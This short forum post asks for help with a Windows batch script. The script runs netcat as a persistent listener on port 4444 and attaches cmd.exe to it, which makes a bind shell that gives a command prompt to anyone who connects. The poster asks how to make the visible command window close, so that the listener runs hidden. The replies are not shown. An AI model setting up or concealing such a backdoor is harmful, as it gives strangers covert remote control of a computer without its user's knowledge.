Forum Thread: Hide Netcat Listener Command Prompt

I have a netcat listener running from a script

@echo off
nc.exe -Ldp 4444 -e cmd.exe

and the command prompt stays open. I am not great at Windows scripting so how do I force the command prompt to close after the initial running?

2 Responses

Share Your Thoughts

  • Hot
  • Active